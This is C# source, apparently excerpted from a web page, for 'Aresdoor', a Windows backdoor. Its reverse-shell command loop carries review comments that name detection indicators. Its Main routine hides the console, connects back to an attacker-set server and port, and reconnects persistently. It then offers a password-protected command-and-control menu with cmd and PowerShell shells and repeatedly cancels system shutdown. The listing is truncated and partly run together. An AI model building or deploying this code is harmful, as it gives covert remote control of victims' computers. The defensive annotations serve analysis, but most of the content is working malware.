/// <summary>
/// Interactive command loop served over an already-connected <c>TcpClient</c>.
/// Each iteration sends the process's current directory followed by "> " as a
/// prompt, reads one message from the remote peer, and then either changes
/// directory, returns, or hands the text to <c>CommandShell.execCommandPrompt</c>
/// and sends the result back over the same connection.
/// </summary>
/// <param name="tcpClient">Connected socket used for both the prompt/output and the incoming commands.</param>
/// <returns>
/// <c>false</c> when the received text contains "exit"; no other return is visible
/// in this excerpt. The Main listing on this page calls this method as
/// <c>while (bc.CommandPromptBackdoor(tcpClient)) { }</c> and returns to its menu afterwards.
/// </returns>
// NOTE(review): `nc` is not declared in this method; presumably a field of the
// enclosing class (the class header is not part of this excerpt) - confirm.
public bool CommandPromptBackdoor(System.Net.Sockets.TcpClient tcpClient)
{
    while (true)
    {
        // Send the prompt: current working directory + "> ". (The original comment
        // called this "shellcode"; what is sent is only the prompt string.)
        // NOTE(review): the wire encoding used by DataTravelTO is not shown. If it is
        // plain text, an outbound "<path>> " prompt on a client-initiated TCP session
        // is a candidate network indicator - verify against the helper.
        nc.DataTravelTO(tcpClient, System.IO.Directory.GetCurrentDirectory() + "> ");

        // Receive the next message from the remote peer.
        string responseFromServer = nc.DataTravelFROM(tcpClient);

        // Substring test, not a command parse: any message containing "cd" takes this
        // branch. The second space-separated token becomes the new working directory.
        // This call sits outside the try below, so a message with no second token
        // (index out of range) or an invalid path throws out of this method.
        if (responseFromServer.Contains("cd"))
        {
            System.IO.Directory.SetCurrentDirectory(responseFromServer.Split(" ".ToCharArray())[1]);
        }
        // Also a substring test: any message containing "exit" ends the loop.
        else if (responseFromServer.Contains("exit"))
        {
            return(false);
        }
        else
        {
            // Everything else is passed unmodified to CommandShell.execCommandPrompt and
            // its return value is sent back to the peer.
            // NOTE(review): execCommandPrompt is not shown. If it launches cmd.exe, the
            // child process spawned by this binary is the host-side artifact to look for
            // in process-creation telemetry - confirm against the helper.
            try
            {
                nc.DataTravelTO(tcpClient, CommandShell.execCommandPrompt(responseFromServer));
            }
        }
        // NOTE(review): the listing is truncated here - no catch/finally for the try
        // above is shown, and the closing braces of the while loop and the method are
        // missing from the page.
static void Main(string[] args) { /* * Usage: * ./aresdoor.exe [server] [port] * or * ./aresdoor.exe (no args) << requires hardcoded configuration * */ #if !DEBUG /* Hide console if debug mode is disabled. */ var handle = GetConsoleWindow(); ShowWindow(handle, SW_HIDE); // hide window #endif /* Intercept command line arguments if any are found. */ try { if (args.Length >= 2) { server = args[0]; port = Int32.Parse(args[1]); } } catch (Exception exc) { Console.WriteLine(exc.Message); } /* Undertermined code. Not sure if it's required or not? */ if (System.Diagnostics.Process.GetProcessesByName(System.Diagnostics.Process.GetCurrentProcess().ToString()).Length != 0) { System.Environment.Exit(0); } /* Prevent the client (victim) from shutting down the computer */ if (prevent_shutdown == true) { new System.Threading.Thread(() => { System.Threading.Thread.CurrentThread.IsBackground = true; while (true) { System.Diagnostics.Process process = new System.Diagnostics.Process(); process.StartInfo.FileName = "shutdown.exe"; process.StartInfo.Arguments = "-a"; process.StartInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; process.Start(); process.WaitForExit(); System.Threading.Thread.Sleep(2000); } }).Start(); } /* Persistant backdoor connection */ persistantBackdoor: while (true) { if (Networking.checkInternetConn(server)) // Determine if the victim is able to connect to the attacker via DHCP (ping) request { try { #if DEBUG Console.WriteLine("Sending backdoor to: {0}, port: {1}", server, port); #endif // Define a couple of variables that set our connection target System.Net.Sockets.TcpClient tcpClient = new System.Net.Sockets.TcpClient(server, port); // Custom class/method instances NetworkCommunication nc = new NetworkCommunication(); BackdoorCollection bc = new BackdoorCollection(); // Write in loop for a persistant connection while (true) { candcmenu: if (backdoorPassword != "") { nc.DataTravelTO(tcpClient, "This copy of Aresdoor has been password 
protected.\n\n"); inputPassword: nc.DataTravelTO(tcpClient, "Password: "******"\n", string.Empty) != backdoorPassword) { nc.DataTravelTO(tcpClient, "Access denied.\n\n"); goto inputPassword; } // else continue } string aresdoorStartMenu = string.Empty; string responseFromServer = string.Empty; aresdoorStartMenu += "+-------------------------------------------------------------+\n"; aresdoorStartMenu += "| Welcome to Aresdoor - a backdoor written by @BlackVikingPro |\n"; aresdoorStartMenu += "| Current Version: v1.3.1 |\n"; aresdoorStartMenu += "| |\n"; aresdoorStartMenu += "| C&C Menu Version: v1.0 |\n"; aresdoorStartMenu += "+-------------------------------------------------------------+\n"; aresdoorStartMenu += "\nPlease select an option below:\n"; aresdoorStartMenu += " 1) Command Prompt Backdoor\n"; aresdoorStartMenu += " 2) Powershell Backdoor\n"; aresdoorStartMenu += " 3) Exit\n\n"; nc.DataTravelTO(tcpClient, "\n" + aresdoorStartMenu); optionInputDisplay: // Define a mark for requesting an option to be inputted nc.DataTravelTO(tcpClient, "aresdoor> "); // Wait for a response responseFromServer = nc.DataTravelFROM(tcpClient); responseFromServer = responseFromServer.Replace("\n", string.Empty).Replace(" ", string.Empty); if (responseFromServer == "1") { while (bc.CommandPromptBackdoor(tcpClient)) { } goto candcmenu; } else if (responseFromServer == "2") { while (bc.PowershellBackdoor(tcpClient)) { } goto candcmenu; } else if (responseFromServer == "3" || responseFromServer == "exit") { nc.DataTravelTO(tcpClient, "Closing TCP Connection... 
You have 5 seconds before another shell is spawned.\n"); nc.CloseTCPStream(tcpClient); System.Threading.Thread.Sleep(5000); goto persistantBackdoor; } else if (responseFromServer == "") { goto optionInputDisplay; } else { nc.DataTravelTO(tcpClient, "Sorry, \"" + responseFromServer + "\" is not a recognized command.\n"); goto optionInputDisplay; } } // sendBackdoor(server, port); } #if DEBUG catch (Exception exc) { Console.WriteLine(exc.Message); goto persistantBackdoor; } // pass silently unless debug mode is enabled #else catch (Exception) { goto persistantBackdoor; } #endif } #if DEBUG else { Console.WriteLine("Couldn't connect to {0}:{1}. Retrying in 5 seconds...", Networking.resolveHostName(server), port); }